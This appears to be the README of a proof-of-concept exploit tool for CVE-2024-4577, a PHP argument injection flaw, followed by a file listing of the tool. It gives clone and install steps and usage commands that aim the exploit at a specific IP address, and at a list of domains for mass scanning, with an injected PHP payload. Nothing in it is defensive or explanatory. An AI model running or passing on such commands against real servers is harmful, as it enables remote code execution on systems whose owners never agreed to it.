# CVE-2024-4577
Argument injection vulnerability in PHP
## INSTALL
git clone https://github.com/didarul342/CVE-2024-4577.git
cd CVE-2024-4577
pip3 install -r requirements.txt
## USAGE
```py
# Scan A Target
python3 CVE-2024-4577.py -t https://160.153.61.66/ -c "<?phpphpinfo();?>"
# Scan a list of Targets
python3 CVE-2024-4577.py -f domains.txt -c "<?phpphpinfo();?>"
```
[4.0K] /data/pocs/be4783ce314624f4d7b710bff6aab7a254f8e623
├── [2.1K] CVE-2024-4577.py
├── [ 388] README.md
└── [ 18] requirements.txt
0 directories, 3 files